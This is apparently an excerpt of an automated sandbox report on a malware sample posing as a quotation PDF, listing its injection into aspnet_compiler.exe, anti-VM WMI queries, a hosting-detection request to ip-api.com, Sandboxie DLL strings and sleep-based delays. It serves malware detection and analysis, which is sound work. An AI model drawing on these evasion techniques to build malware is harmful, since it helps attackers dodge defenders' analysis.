                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: QUOTATION_JULQTRA071244#U00faPDF.scr.exe PID: 7612, type: MEMORYSTR
                    Check if machine is in data center or colocation facility
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL@\
                    Source: aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002E8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLT-
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002DE5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.000000000346B000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000007156000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000006.00000002.2681049301.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLESELECT * FROM WIN32_COMPUTERSYSTEM
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000031DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: EXPLORER;SBIEDLL.DLL<SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE=VERSION>SERIALNUMBER@VMWARE|VIRTUAL|A M I|XENASELECT * FROM WIN32_COMPUTERSYSTEMBMANUFACTURERCMODELDMICROSOFT|VMWARE|VIRTUALEJOHNFANNAGXXXXXXXX
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeMemory allocated: 1370000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeMemory allocated: 3000000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeMemory allocated: 2D90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeMemory allocated: 69D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeMemory allocated: 79D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 2BB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 2DB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 2BD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 595235Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 595125Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeWindow / User API: threadDelayed 7839Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeWindow / User API: threadDelayed 1981Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -25825441703193356s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7712Thread sleep count: 7839 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7712Thread sleep count: 1981 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -99890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -99780s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -99671s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -99562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -99452s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -99343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -99234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -99125s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -99013s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -98802s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -98500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -98375s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -98265s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -98156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -98046s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -97937s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -97825s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -97718s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -97609s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -97500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -97390s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -97281s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -97172s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -97047s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -96937s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -96828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -96718s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -96609s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -96500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -96390s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -96279s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -96149s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -96031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -95922s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -95812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -95703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -95593s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -95483s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -95375s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -95265s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -95156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -95047s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -94937s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -94828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -94718s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -94609s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -595235s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe TID: 7684Thread sleep time: -595125s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 99890Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 99780Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 99671Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 99562Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 99452Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 99343Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 99234Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 99125Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 99013Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 98802Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 98500Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 98375Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 98265Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 98156Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 98046Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 97937Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 97825Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 97718Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 97609Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeThread delayed: delay time: 97500Jump to behavior
